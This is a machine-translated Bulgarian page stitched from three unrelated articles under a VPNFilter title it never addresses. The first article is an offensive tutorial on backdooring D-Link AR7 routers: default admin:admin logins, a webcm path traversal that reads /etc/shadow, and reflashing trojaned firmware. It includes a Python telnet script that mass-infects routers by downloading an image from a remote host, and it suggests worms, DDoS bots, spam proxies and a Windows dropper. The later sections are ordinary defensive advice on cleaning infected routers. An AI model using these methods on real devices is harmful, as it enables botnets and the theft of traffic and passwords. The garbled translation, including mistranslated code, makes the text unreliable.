Как да разберете дали рутерът е заразен с вирус. Как да проверите вашия рутер за инфекция с VPNFilter

Здравей мой читател! В тази статия ще говоря за прекрасни ADSL рутери
- незаменими парчета желязо в домашни и индустриални мрежи. Ще ви разкажа за въпроса
експлоатация на тези парчета желязо за цели изгодни за нас - шиене в брутално
Троянски кон вътре в рутера. И по такъв начин, че нито едното, нито другото
интелигентен администратор, без уши потребител.

Желания или изисквания за IQ

Когато написах тази статия, предположих, че четенето й ще бъде достатъчно
напреднал потребител с инсталиран GNU \ Linux, който също има някои умения
работа и програмиране в тази операционна система. Обаче се появява
възможно е да повторя действията си на Windows (с помощта на Cygwin, например), но
няма да бъде описано. За максимално удоволствие вие ​​също трябва
умения за притежаване на поялник (това е по избор).

И всичко започна...

Нещо, което се разсеях. И така, всичко започна с това как един ден точно това
парче желязо, или по-скоро, то предателски прекъсна интернет връзката и не го направи
искаше да го възстановя. В същото време тя беше далече, с физически достъп
нямаше кой да я види (все пак нещо, което излъгах - просто ме мързеше да стана от дивана
рестартирайте рутера :)), уеб интерфейсът не отговори, но го запомних
това нещо трябва да е telnet или ssh. Отидете в административната област i
не съм опитвал преди и не съм променил безразсъдно паролата на моя сметка(как
се оказа по-късно, напразно, защото по подразбиране е "admin: admin"). И аз
опитах SSH и се получи!

$ ssh [защитен с имейл]
$ Парола:

Като гръм от ясно небе! BusyBox! Никога не съм мислил под чия
този рутер е под контрол, оказва се - GNU / Linux! Почувствах се страховито
Чудя се как работи всичко тук и психически, благодарение на мързел и случайност, аз
се впусна в проучване.

Събиране на информация

И така, откъде започнах? Разбира се, от списъка с налични команди:

# заета кутия
...
Текущо дефинирани функции:
[, ash, busybox, cat, chgrp, chmod, chown, cp, date, dd, df, echo, false, free,
grep, име на хост, id, ifconfig, init, insmod, kill, ln, login, ls, lsmod, mkdir,
modprobe, монтиране, mv, passwd, ping, ps, pwd, рестартиране, rm, rmmod, route, sh, заспиване,
sync, tar, test, tftp, touch, true, tty, umount, wget, whoami, да

Комплектът е доста вменяем, достатъчен за нормално проучване и реализация на идеи.
Следващият предизвика интерес към версията на ядрото:

# cat / proc / версия
Linux версия 2.4.17_mvl21-malta-mips_fp_le ( [защитен с имейл]) (gcc версия 2.95.3
20010315 (издание / MontaVista)) # 1 чт, 28 декември 05:45:00 CST 2006 г.

За справка: MontaVista е вградена ориентирана дистрибуция
системи. По-голямата част от производителите на мрежово оборудване дават
предпочитание към тази система. Може да се намери и на други устройства, например в
електронни книги или мобилни телефони.

# cat / etc / версии
КЛИЕНТ = DLinkRU
МОДЕЛ = DSL-500T
ВЕРСИЯ = V3.02B01T01.RU.20061228
HTML_LANG = EN.302
ДЪСКА = AR7VW
VERSION_ID =
CPURCH_NAME = AR7
MODEL_ID =
FSSTAMP = 20061228055253

# cat / proc / cpuinfo
процесор
: 0
модел на процесора
: MIPS 4KEc V4.8
BogoMIPS
: 149.91
изчакайте инструкция: не
микросекундни таймери: да
допълнителен вектор за прекъсване: да
хардуерна точка за наблюдение: да
VCED изключения: не са налични
VCEI изключения: не са налични

AR7 е двуядрен чип, разработен от Texas Instruments. Той
съдържа пълноправен ADSL рутер на един чип, поддържащ ADSL1 стандарти,
ADSL2, ADSL2 +. Базиран на високопроизводителен MIPS 4KEc RISC процесор, с
тактова честота 175 или 233 (в зависимост от производствената технология: 18 микрона
или 13 микрона). Чипът съдържа на борда 2 UART интерфейса, единият от които (UART_A)
се използва за показване на информация за отстраняване на грешки, както и EJTAG интерфейс, който обслужва
за отстраняване на грешки (flashing) Флаш памет. Използването на тези интерфейси ще бъде
описано по-долу.

Накрая погледнах информацията за паметта:

# cat / proc / монтира
/ dev / mtdblock / 0 / squashfs ro 0 0
няма / devfs rw 0 0
proc / proc proc rw 0 0
ramfs / var ramfs rw 0 0

# cat / proc / mtd
dev: размер изтрива размер име
mtd0: 0034f000 00010000 "mtd0"
mtd1: 00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"

Естествено, без да забравяме за адресите на блока:

# cat / proc / ticfg / env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000

От горното следва, че флаш паметта (/ dev / mtdblock) има 5 блока:

mtd0- образ файлова система SquashFs. Това е специален файл
компресирана система само за четене. За
компресията използва алгоритъма gzip, но в в такъв случай- LZMA (коефициент на компресия
по-горе). Размерът на този блок е 4 MB.

mtd1- този блок съдържа ядрото на MontaVista, компресирано от алгоритъма LZMA
състояние, размер на блока 600 KB.

mtd2- Bootloader ADAM2, извършва зареждане на ядрото, също има
услуга FTP сървър за възстановяване и флашване. Повече подробности за него ще има
каза още. Размерът на блока е 64 KB.

mtd3- споделени между конфигурационните данни и средата
(променливи на средата) блок, който може да се види в /proc/ticfg/env.
Данните за конфигурацията се намират в /etc/config.xml. Посредник между файловете
система, конфигурационният блок е затворен (като всички cm_ *, контрол, о
ги по-късно) програмата cm_logic. Размерът на този блок също е 64 KB.

mtd4- това съдържа подписа на фърмуера, ядрото и изображението на файла
системи. Този блок се използва при актуализиране на фърмуера през уеб интерфейса.
Първоначално се съхранява в този блок, след което се проверява контролната сума
и ако се сближи, се регистрира за новата си позиция.

RAM (16 MB в този модел, но ADAM2 в този модел
вижда само 14 MB, третира се с актуализация), монтиран в директорията / var и
можете безопасно да използвате за нашите цели:

#Безплатно
общо използвани безплатни споделени буфери
Mem: 14276 10452 3824 0

Нека не забравяме да преминем през списъка с процеси. От интересните, които се криеха тук
демони: thttpd - уеб-сървър; dproxy - прокси сървър, кеширащ DNS заявки; ddnsd
- DNS демон; pppd ... - действителният демон, който реализира връзката чрез протокола
PPP, а в параметрите виждаме данните за акаунта. Така че, ако рутерът не го прави
се прави на маркуч (прочетете - не в режим на мост), тогава можете
лесно да получите акаунт.

Програмите cm_ * са собствени и вече са включени в изходните кодове.
компилиран (тези програми също са разработени от Texas Instruments, на D-Link
не трябва да се кълнете за неспазване на лицензите).

cm_logic- програма, която управлява логиката на системата, чрез нея
конфигурацията преминава през; синхронизира /etc/config.xml с
съответната част от съдържанието на / dev / ticfg (сочи към mtd3).

cm_cli- интерфейс командна линияза управление и конфигурация
системи. Например, настройките за връзка се правят през този интерфейс.

cm_pc- изпълнява и наблюдава процеси, връзки към правила
(например стартирайте програмата като демон, правилата включват и информация за
портове за отваряне), описани в /etc/progdefs.xml; заредени веднага след това
ядра.

webcm- CGI интерфейс, пълен с дупки, например ви позволява да гледате / etc / сянка,
просто като се позовава на url.

http://192.168.1.1/../../../etc/shadow

Нямам нищо, thttpd не е толкова просто, но ако е така:

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

Още нещо. Това може да се използва за събиране на информация, ако няма достъп до
ssh / telnet, но има достъп до уеб интерфейса.

фърмуер cfg- използва се за фърмуер през уеб интерфейса. На входа
на тази програма, изображение се изпраща от уеб интерфейса чрез POST заявка и то вече е
пренасочва към флаш памет след проверка контролна сумаобраз.

Това завършва събирането на първична информация, време е да преминем към решаващо
действия.

Инсталиране на инструменти за разработка и компилиране на фърмуера

фърмуер D-Link рутери(и всички останали базирани на GNU / Linux)
разпространявани под GPL лиценза, можете да ги получите от официалния
FTP сървър. Всъщност можете да изберете всеки от списъка с предложени фърмуери,
те са еднакви (относно Т-серията). Доставката съдържа изходния код на ядрото, средата,
необходимите инструменти и набор от инструменти за разработване/компилиране на съществуващи
програми. Тя трябва да бъде разопакована в корена и добавена към променливата на средата
ПЪТЯТ път към bin-директорията на веригата от инструменти:

$ tar xvf tools.tgz
$ export PATH = $ PATH: / opt /

Сега, за да компилирате свой собствен фърмуер, отидете в директорията
с изходните кодове и изпълнете този make.

$ cd DSL / TYLinuxV3 / src && make

Ще бъдат зададени много въпроси относно разрешаването на поддръжка на устройства (по-добре
отговори им положително). В края на компилацията в директорията TYLinuxV3 / images
ще бъдат създадени образи на фърмуера. Можете също да стартирате скрипта със същото име с вашия
модел от директорията / TYLinuxV3 / src / скриптове.

Няколко думи за прехвърлянето на файлове между рутер и компютър. Първият
методът, който приложих, е възможността за прехвърляне на файлове с помощта на протокола SSH,
с помощта на програмата scp. Но малко по-късно разбрах, че mc (Midnight
Commander) също има възможност за свързване чрез SSH (Panel -> Shell връзка).
Като алтернатива можете да настроите уеб или FTP сървър на работното си място. По-късно и
даде предпочитание на уеб сървъра, защото той работи най-бързо. инсталирах
thttpd, малък и бърз, точно като на рутер. Стартираме го и го дърпаме
рутер файл, след като отидете в директорията / var (той, както споменахме
налични преди това за запис).

$ thttpd -g -d ~ / ForRouter -u потребител -p 8080
# cd / вар
# wget http://192.168.1.2/file

За да изтеглите файла от рутера, можете също да изведете уеб сървъра:

# thttpd -g -d / var -u корен -p 8080

Обърнете внимание, ако искате да изтеглите изпълнимия файл от рутера, трябва
премахнете правата за стартиране. При изтегляне Голям бройфайлове от рутера
по-добре е да използвате mc, няма да е необходимо първо да копирате файловете в / var и
премахнете правата и след това изтрийте тези файлове, за да освободите място. Като цяло, случаят
вкус, изберете всяка опция, която ви подхожда.

Създаване на ваша собствена програма

Нека започнем, разбира се, с класическата програма за програмиране HelloWorld. Някои специални
няма правила. Текстът на програмата е до болка познат:

#включи
#включи

int main (недействителен)
{
printf ("Mate.Feed.Kill.Repeat.");
връщане на 0;
}

Компилирайте (пътят към веригата от инструменти "и трябва да бъде посочен в променливата на средата
ПЪТ):

$ mips_fp_le-gcc hell.c -o по дяволите
$ mips_fp_le-strip -s ада

# cd / вар
# chmod + x по дяволите
# ./ад

И ... нищо няма да се случи или известието за пътя ще бъде изхвърлено не е намерен... Какво е
случай? Вече говорих за cm_pc - тази програма стартира други
според правилата, описани в /etc/progdefs.xml. Сега дойде времето
модифицира и флаш изображения на файлова система.

Модификация на файловата система

За да промените файловата система, първо трябва
разопаковам. Както споменах, файловата система тук е SquashFs с LZMA пач.
Пакетът за разработване на фърмуер включва само програмата mksquashfs (за създаване
изображение), unsquashfs (за разопаковане) липсва. Но няма значение, всичко е налично
на сайта на файловата система се нуждаем от първата версия. Чрез поставяне на LZMA пластир и
след като събрахме комуналните услуги, ние ги поставихме удобно място... Първо получаваме изображението
файлова система от рутера:

# cat / dev / mtdblock / 0> /var/fs.img

$ mkdir unpacked_fs
$ unsquashfs fs.img unpacked_fs

Сега можете да го модифицирате, както желаете, или можем да хвърлим FuckTheWorld в
директория / bin и добавете правило за изпълнение в /etc/progdefs.xml.

$ cp здравейте unpacked_fs / bin
$ vim unpacked_fs / etc / progdefs.xml

И добавете това (между таговете ):

ада
/ bin / ад

Спестяваме и опаковаме обратно:

$ mksquashfs unpacked_fs my_fs.img -noappend

Моля, имайте предвид, че изображението на файловата система не трябва да надвишава
допустими размери. Ако имате желание да опитате нещо спешно, а то не
напаснете, премахнете от изображението нещо "ненужно" като grep, whoami или
използвайте UPX изпълнимия пакет за пакетиране. Сега качете на рутера
изображение и преминете към следващия раздел.

Заснемане на изображение на файловата система

Методът за мигане на рутера е много прост, той се състои в достъп до устройството
/ dev / mtdblock / *. И така, качваме на рутера по всеки удобен начин изображение на файла
системи и направете това просто действие:

# котка my_fs.img> / dev / mtdblock / 0 && рестартиране

# cp my_fs.img / dev / mtdblock / 0 && рестартиране

След известно време, когато процесът на запис премине, рутерът ще се рестартира и
промените ще влязат в сила. Опитваме се да изпълним нашия пример:

#ад
Mate.Feed.Kill.Repeat.

Методи за възстановяване в случай на повреда

Преди да мигате рутера с по-сериозни "занаяти", трябва да разберете как
как да действаме в критични случаи, когато рутерът откаже
натоварване. Няма безнадеждни ситуации. FTP сървърът ADAM2 идва на помощ. За
първо трябва да стартирате FTP клиента на IP адреса на ADAM2, който може да бъде шпиониран
в / proc / ticfg / env (параметър my_ipaddress).

$ ftp 192.168.1.199
220 ADAM2 FTP сървърготов.
530 Моля, влезте с USER и PASS.

За по-голяма яснота можете да активирате режима за отстраняване на грешки, след това всички
информация и всички FTP отговори:

Вход / парола - adam2 / adam2. Процесът на мигане е много прост. Да започна
прехвърлете FTP сесията в двоичен режим:

ftp> цитат MEDIA FLSH

Сега изпращаме, например, изображение на файловата система и посочваме местоположението
дестинация:

ftp> поставете fs.img "fs.img mtd0"

Чакаме края на записа, рестартирайте рутера, излезте от сесията:

ftp> цитат REBOOT
ftp> излезте

Всичко! Както виждате, няма нищо трудно, сега ако нещо се обърка, вие
винаги можете да оправите ситуацията.

За удобство на работа трябва да дадете нормален IP адрес, активирате
автоматично зареждане (за да не танцува с нулиране) и леко увеличете времето
чака връзка, преди да зареди ядрото. Всички тези параметри се съхраняват в
променливи на средата, има специални екипи FTP ADAM2: GETENV и SETENV (за
получаване и задаване на променлива, съответно). В FTP сесията въведете следното
команди:

ftp> SETENV автоматично зареждане, 1
ftp> SETENV autoload_timeout, 8
ftp> SETENV my_ipaddress, 192.168.1.1
ftp> цитат REBOOT
ftp> излезте

Рутерът се рестартира и можете да влезете в ADAM2 на 192.168.1.1:21. Ако
ще има желание за презакачване на изображението на ядрото и ядрото ще откаже да зареди, FTP
ще започне сам. Преди да мигате модифицирани изображения, уверете се, че
запазете ток за възстановяване. По принцип можете да променяте променливите на средата
и чрез / proc / ticfg / env, просто исках да ви разкажа повече за работата с FTP.

# echo my_ipaddress 192.168.1.1> proc / ticfg / env

И можете да проверите промените по следния начин:

# cat / proc / ticfg / env | grep my_ipaddress

Какво да направите, ако искате да опитате да презаредите буутлоудъра и как
да действам в случай на неуспех? Или рутерът не стартира по някаква причина и
нямате достъп до ADAM2? Има изход - JTAG, или по-скоро този чип съдържа EJTAG
(разширена версия). Това е интерфейс за отстраняване на грешки/програмиране във веригата.

За да се свържем с този интерфейс, се нуждаем от LPT порта на компютъра,
конектори и 4 резистора. Схемата е много проста.

Бързам да отбележа, че фърмуерът чрез JTAG не е бърз, ще отнеме достатъчно
много време. Така че си струва да използвате само за възстановяване на буутлоудъра,
дори и да не работи. За да комуникирате чрез JTAG, трябва да използвате специален
програма като UrJTAG. По-долу е даден пример за това как работи този интерфейс.
Установяване на връзка:

jtag> паралелен кабел 0x378 DLC5
jtag> откриване

Откриване на флаш памет:

jtag> detectflash 0x30000000 1

Четене на флаш памет:

jtag> readmem 0x30000000 0x400000 fullflash.img

Записване в паметта (бутлоудър):

jtag> flashmem 0x30000000 adam2.img

Също така е полезно да знаете за интерфейса UART (обещах да говоря за него по-рано). V
UART_A докладва, тоест регистрира зареждащия инструмент (в ранен етап на зареждане от
можете да говорите с него) и ядрото. При писане на модифицирани ядра е така
незаменим за отстраняване на грешки. UART - Универсален асинхронен приемник / предавател
(универсален асинхронен трансивър) почти винаги е включен
микроконтролери.

Схемата на адаптера е много проста. Базиран само на една микросхема -
TTL преобразувател на ниво: MAX232 за COM и FT232R за USB. Микросхеми
са доста често срещани и няма да има проблеми с покупката.

Схемата е сглобена на макетна платка (която може лесно да се постави в кутията
COM порт конектор) за 20 минути и носи много предимства. Например при отстраняване на грешки
ядрата са абсолютно незаменимо решение. А ако електрониката е стегната? Излезте
са USB-кабели за стари телефони, просто имат конвертор
UART - USB.

Някои идеи за разпространение

Вашият прокси/сокс на чужд рутер е страхотен. Както, всъщност, и спам
рутер за всички протоколи. Това не е компютър с Windows за вас, който
пренареждам всеки месец :). Рутерите често не се сменят или префлашват. да и
Кой освен нас ще си хрумне в главите за инфекция с рутер?

Не забравяйте, че имаме целия трафик от потребителя/мрежата под наш контрол. За още
мощни рутери, вече е възможно да се окачи DDOS бот. Скриване на файл/скриване на процеса,
прихващане на запис в mtd блокове, елиминиране на изтриването на нашата програма - всичко това
както и да е!

Да речем, че сте на път да започнете да пишете сериозна програма за рутер.
Много доброто отстраняване на грешки е важно, вероятно ще ви се наложи няколко пъти
пренаписване / възстановяване на изображения ... Това е много тъжна перспектива. Равномерни ръце
те се понижават малко, ако вземем предвид и че ресурсът за презаписване на Flash паметта
малък (за повече подробности вижте документацията за чипа памет) и има перспектива
изхвърли я. Но има изход! Qemu може да емулира AR7! Можете ли да си представите какво
предоставя ли възможности и безкрайно удобство? Сега нищо не ни пречи
напиши нещо невероятно готино!

Така. Написал си програма, проверил си я на свой или на 1-2 чужди рутера, но все пак
цялата мрежа все още е напред, ръчното заразяване е мрачно, вече стартирате на 10-ия рутер
проклина целия свят, и плува в очите на струните на "cat" и "mtd". Ще пишем
програма за автоматизиране на тези рутинни действия. Избрах езика на python.

Работният план е както следва:

  • създаване на списък с рутери, например с помощта на nmap;
  • скриптът трябва да вземе от списъка по реда на IP адреса, да премине
    telnet със стандартен вход/парола;
  • след това същите действия: качване на промененото изображение,
    презаписване, рестартиране.

#! / usr / bin / env python
# Кодиране = UTF-8

импортиране на telnetlib, време

СЪРВЪР = "http://anyhost.com/fs.image"

за адрес в отворен ("iplist.txt"):
telnet = telnetlib.Telnet (addr)
telnet.set_debuglevel (1)
telnet.read_until ("вход:")
време.сън (5)
telnet.write ("администратор \ n")
telnet.read_until ("Парола:")
telnet.write ("администратор \ n")
telnet.read_until ("#")
telnet.write ("cd / var && wget" + СЪРВЪР)
telnet.read_until ("#")
telnet.write ("cat fs.image> / dev / mtdblock / 0")
telnet.read_until ("#")
telnet.write ("рестартиране")
telnet.close ()

Логиката на сценария е много далеч от идеалната, сега ще обясня защо. За
първо трябва да проверите версията на фърмуера / ядрото и модела на рутера, защото може да има
сериозни различия в работата. Освен това, вместо заготовки на фърмуера, трябва да изпомпвате
изображение на файловата система от рутера, разопаковайте, модифицирайте и изпратете
обратно. Това ще премахне проблемите със съвместимостта между различните
модели / версии на фърмуера, защото стабилността на работата е най-важното нещо за вас.
Освен това вирусът може да има функциите на червей и, ако желаете, винаги можете
завинтете мрежов скенер, груба сила за RDP и подобни чипове към него.

Има и друг страхотен метод за разпространение. Нищо не ти пречи да пишеш
програма за Windows, която ще имате със себе си (или изтеглете от вашия
сървър) изображение на файловата система и заразете рутера с него, ако има такъв.
Преразпространете тази програма с всички "стандартни" средства: сменяеми устройства,
експлойти за програми, заразяване на други програми ... Чрез комбиниране на тези методи,
можете да създадете сериозна пандемия. Само си представете тази картина - в края на краищата
подобни устройстваса повсеместни.

Защита на рутера

След като изрових всичко това, си помислих: как можете да защитите рутер? И тогава, виждате, и
ще си го взема сам. Първата стъпка е да промените потребителската парола на по-сложна и
дълги (ограничение - 8 знака), смяна на банери и служебни поздрави
(с шестнадесетичен редактор или, което е за предпочитане, прекомпилирайте програмите), така че
nmap или други скенери не успяха да открият версии на услугата.

Трябва също да промените портовете, на които висят демоните. Това се прави от
модификации progdefs.xml. Убийте telnet (най-лесният начин да намерите парола за него, да
и протоколът е незащитен, защо ни е нужен), включете защитната стена, разрешете връзката
към услуги само от вашия собствен IP или MAC адрес. Използвайте и защитна стена
за да защити мрежа или компютър, не е напразно, че присъства. Компетентна настройка
правилата винаги ще ви помогнат да се защитите.

Заключение

Много, не само D-Link рутери и други подобни устройства са изградени върху
AR7 чип, списъкът включва Acorp, NetGear, Linksys, Actionec ... доста
този AR7 е популярен заедно с MontaVista. Оттук следва, че използването на същото
toolchain, можете да изпълнявате стъпките, описани в статията, без никакви проблеми.

Помислете за това: освен злонамерени действия, можете да направите и нещо полезно/приятно за себе си
и други (не споря, удоволствието от хакването не може да бъде заменено, но все пак).
Можете да направите свой собствен фърмуер, например, по-мощни рутери, способни
изтегляне / разпространение на торенти ... Всички модели имат USB 1.1 интерфейс, но в по-младите
модели, не е запоен. Добавете USB модул и драйвер за файлова система към ядрото,
оборудвайте рутера с флаш памет - и в резултат получавате един вид мрежово хранилище за
малко пари. Вариантите са много, а идеите трябва да възникват в хиляди - не
ограничавайте се, създавайте и създавайте!

По време на разпространението на интернет чрез Wi-Fi през рутер могат да се появят различни проблеми. Например, спиране и висок пинг могат да възникнат поради вирусна инфекция на разпределителното оборудване. Нека да разгледаме по-отблизо как да почистите рутера сами.

Симптоми

Оборудването може да бъде заразено със следните видове вируси:

  • забавяне на скоростта на предаване на данни. Например, вирусът е в състояние да събори настройките, той ще го направи ниска скорост, загуба на сигнал и др.;
  • подправяне на адреси на сайтове. Това се случва така: човек отива към ресурс и злонамерената програма променя DNS и потребителят се пренасочва към сайт с реклама или става видим за него рекламни елементипубликувани от собствениците на сайта. Този вирус също е опасен поради причината, че е в състояние да пренасочва към ресурс, който съдържа друго злонамерено съдържание.


Във всеки случай, ако рутерът е нестабилен, е необходимо да го проверите за вируси, които са достатъчно лесни за премахване.

Как протича инфекцията?

Рутерът разпространява интернет до всички свързани към него джаджи. Това означава, че всички устройства работят в едно локална мрежа... Вирусът се възползва от това: влиза в компютъра през уебсайт или качен файл, след което влиза в рутер през мрежата, в който извършва злонамерени действия.

Тежестта на ситуацията зависи от версията на вирусната програма, например някои вредители се държат скрито и започват да действат активно само след като са в рутера, други, напротив, могат да повредят операционната система по пътя.

Проверка на мрежово оборудване за инфекция

Преди да почистите оборудването от вируси, трябва да проверите рутера за тяхното присъствие. За да направите това, трябва да свържете интернет кабела директно към порт на вашия компютър. Издърпайте WLAN проводника от рутера и го свържете към компютъра, след което извършете следните манипулации:

  • Стартирайте браузъра си и отворете няколко сайта. Уверете се, че съдържанието им е правилно и няма подмяна на сайтове, рекламни елементи. За целите на проверката е по-добре да изберете ресурси, в които не може да има реклама.
  • Изпълнете сканиране на вашия компютър с антивирусна програма. Това е необходимо, за да се определи пътя на заразяване - от компютър или от рутер. Имайте предвид, че може да има няколко вируса и те могат да присъстват както в системата, така и в мрежовото оборудване.


Премахване на вируси

За видео за заразяването на рутера с вируси вижте тук:

За премахване зловреден софтуер, трябва да нулирате настройките до оригиналните. Ако вирусната програма вече е повредила фърмуера, тя ще трябва да бъде преинсталирана.

Нулиране на параметрите

За да почистите рутера, трябва да нулирате настройките му:

  • В задната част на устройството намерете бутона за нулиране. Тя често се откроява от другите. Задръжте го и го задръжте, докато рутерът нулира параметрите и се рестартира. Не забравяйте, че когато рестартирате, всички настройки ще бъдат загубени и рутерът ще трябва да бъде конфигуриран отново.


  • За да конфигурирате рутера, трябва да го свържете към компютъра с помощта на кабел, след това стартирайте браузъра и наберете адреса 192.168.0.1. Може да е различно и е посочено на самия рутер или в документите за него, в инструкциите. При въвеждане на настройките те често въвеждат потребителското име admin, а паролата е същата или 12345. Ако не сте успели да въведете, тогава трябва да погледнете инструкциите за мрежовото оборудване.


  • Намерете опциите бърза настройка... Изберете всички приложими. Можете също да промените паролата и името на мрежата. След като завършите процеса на конфигуриране, запазете ги и рестартирайте рутера.


След като изпълните всички описани стъпки, проверете дали сте успели да се отървете от проблема. Ако не се получи, тогава ще трябва да пренапишете мрежовото оборудване.

Как да извърша мигане?

Случва се вирусна програма да промени фърмуера на рутера. Можете да неутрализирате заразената версия, като я флашнете.

Свържете компютъра си към рутера чрез LAN кабел. Той трябва да бъде включен във всеки рутер. Ако го няма, тогава можете да използвате Wi-Fi връзка... Въпреки това, кабелният метод е за предпочитане.


След като се свържете с рутера, стартирайте браузъра и въведете стойността 192.168.1.1 (или друга стойност, посочена на самото устройство) в полето за адрес, след което ще трябва да въведете паролата и да влезете, за да отворите настройките на рутера. По подразбиране потребителското име и паролата са администратор. Ако не можете да въведете настройките, тогава трябва да разберете текущите данни за влизане, може би те са били променени след последната инсталация.

Изтегли нова версияфърмуер от уебсайта на производителя и, като отидете в настройките на рутера, го изберете на диска на компютъра. Процесът на фърмуера е идентичен за всички рутери.


Защита на мрежово оборудване от вируси

За да предпазите вашия рутер от инфекция, можете да използвате следните указания:

  • Актуализирайте фърмуера до последна версия... Посетете уебсайта на производителя, потърсете вашия модел и изтеглете най-новия фърмуер.
  • Задайте стойност на многоцифрена парола на уеб интерфейса. Не всички рутери могат да променят данните за вход. Въпреки това, ако предоставите силна парола, хакването на уеб интерфейса вече няма да бъде лесно.
  • Задайте офлайн влизане в настройките на рутера.
  • Променете IP адреса на рутера в локален достъп. По време на процеса на хакване вирусът незабавно ще получи достъп до адреси като 192.168.0.1 и 192.168.1.1. Въз основа на това е най-добре да размените третия и четвъртия октет на LAN IP адреса.
  • Доставете надеждни антивирусна програмана компютър. Ако вирус първо се опита да проникне в компютъра ви, той ще бъде премахнат незабавно, предотвратявайки повреда на вашия рутер.
  • Не съхранявайте пароли в браузъра си.


Както можете да видите, не е трудно да проверите рутера за вируси и да го почистите. Но е по-добре да следвате прости съветиза предотвратяване на инфекция. Но ако това се случи, вие знаете какво да правите.

Уважаеми читатели. За да спестите вашето време. Веднага за основното. ВСИЧКО по-долу помага при наличие на троянски коне или вируси на компютъра за 5-7 дни. През този период има сканирания от интернет, но СЛЕД хака настъпва подозрителна тишина - няма сканирания - заразеният рутер вече не ги пуска в компютъра, приема команди и ги изпълнява. Това се отразява на скоростта на интернет - тя пада.

Ако вашият рутер вече е заразен, кражбата на FTP, поща и други пароли е въпрос на близко бъдеще.

Още през 2009г. Някой DroneBL разказа на света за (началото?) на епидемия от вируси, които заразяват рутери. Неговата новина се появи след атаката на сайта, администраторите на този сайт разкриха, че това е фундаментално новият видмежду Ddos атаки... Атаката е извършена от заразени рутери. Така че сега "семейството" зомби компютри се сдоби с попълване - зомби рутери. Открит е ботнет, който се състои от заразени домашни рутери! Тази мрежа беше наречена "psyb0t". Така официално започна епидемията от рутер вирус.

Хакването става чрез сканиране на портовете на рутера и отнемане на контрол над него. За съжаление в интернет се разпространяват статии за това как точно този или онзи модел рутер е най-лесният за хакване. Но именно там можете да научите как да се предпазите от това нещастие. След установяване на контрол върху рутера, започва шпиониране на съдържанието на преминаващия трафик. Кражба на пароли. Присъединяване към общата злонамерена дейност на ботнет мрежата в глобалния интернет. Сканиране на портове за домашен компютър, но тук ще се спра по-подробно. Авторът успя да проследи това присъствие мрежова връзкадо компрометиран рутер води до такива проблеми. Когато преинсталирате защитната стена, вирусите се появяват от нищото в системата. Когато се опитвате да инсталирате Debian или Ubuntu, докато изтегляте актуализации по време на инсталацията, тези системи са инсталирани неправилно. А именно

  1. Инсталираният Firestarter не може да се стартира - стартира се административната функция и това е всичко. т.е., нещо се стартира с администраторски права, но какво е неизвестно. Firestarter просто не стартира.
  2. Ако има интернет връзка, Deadbeef НЕ стартира, когато рутерът е изключен, той веднага се включва.
  3. Някои приложения, които изискват администраторски права, се стартират без да се иска парола, други не се стартират изобщо.
  4. Откакто е написана тази статия, тези точки станаха по-малко изразени. Тоест ще има проблеми, но те ще ИЗГЛЕДАТ по различен начин.

Преинсталиране НА СЪЩИЯ ПК СЪС СЪЩИЯ инсталационен диск, когато рутерът е бил ИЗКЛЮЧЕН. Системата (тествана за Ubuntu) работеше като часовник. Това не е изненадващо, защото първите уязвими бяха рутерите с операционна система Linux Mipsel. Разбира се, вредата, която идва от зомби рутера, е "по-разнообразна", отколкото забелязах и описах тук, но отколкото на този моментбогати, така че споделяме...

Инсталираният Windows (с деактивиран заразения рутер) оцеля, но Agnitum Outpost Firewall Pro откри сканиране на портове от първите минути след инсталирането. Тези. рутерът атакува порта (портовете).

Ориз. Сканиране на портовете ми от интернет и накрая от заразен рутер.

Както можете да видите на фигурата, на 27.04.2017 г. в 23:51:16 се проведе сканиране от зомби рутер. Преди това имаше сканирания от Kaspersky Security Network - 130.117.190.207 (защитната стена не ги "харесва", но това е норма при инсталиране на Kaspersky) и не е ясно откъде. И на 27.04.12 рутерът беше нулиран до фабричните настройки (Huawei HG530). Оттогава те идват само от Kaspersky Security Network - 130.117.190.207 и ARP_UNWANTED_REPLY - авторът е активирал ARP филтриране. Следователно опитите на рутера да „говори“ с компютъра отново (това е нормална дейност на рутера - но сега Agnitum пропуска само тези ARP отговори, които идват в отговор на искането на моя компютър), както и опити от някои лицата за прихващане на трафик с помощта на фалшив ARP отговор са блокирани от защитната стена. Ако някой прихване трафика ми по този начин и го прехвърли през компютъра си, тогава аз ще бъда в ролята на служител в офиса, използващ интернет, докато системният администратор на това предприятие вижда всичките ми действия, изготвяйки подробен отчет за шефа . Колко писма (на кого, за какво) са написани, колко чатих в ICQ. Разбира се, пароли от поща и т.н. също може да краде.

Изводът - от момента, в който нулирах рутера си и направих това, което описвам по-долу, няма атаки от интернет. "Артилеристът" е елиминиран, рутерът е чист и прави САМО това, за което е създаден. Но троянският кон на компютъра също трябва да бъде премахнат, в противен случай той вече ще насочи хакерите към вашия IP.

Производителите на мрежов хардуер не предлагат мерки за защита. Инструкциите за рутерите съдържат описание как да въведете потребителско име и парола за достъп до доставчика, но няма дума, че администраторската парола по подразбиране в рутера не може да бъде оставена! Освен това рутерите трябва да имат елементи дистанционнокоито често се включват. Производителите на антивирусен софтуер мълчат. Неволно възниква въпросът кой има полза от това.

Пътища на заразяване.

По-добре да се види веднъж. За това, което предлагам GIF анимация, със схематичен анализ на ситуацията. Ако не се вижда, значи Adblock или нещо подобно пречи - изключете го на тази страница.

Има две от тях. Първият е чрез WAN, това е Интернет. Тези. хакерите намират вашия IP, например, когато изтегляте или разпространявате файлове с помощта на торент протокола (повече за това в края на статията) и чрез сканиране на вашия IP намират слаби места в защитата на рутера. Но това е по-рядко срещано. Как да затворите тази порта, четем по-нататък в тази статия.

Или имаме троянски кон на нашия компютър. И тогава той води хакери към нашия динамичен (!) IP. Познавайки този адрес, те вече методично "чукват" рутера. Четем за троянци по втория път на заразяване.

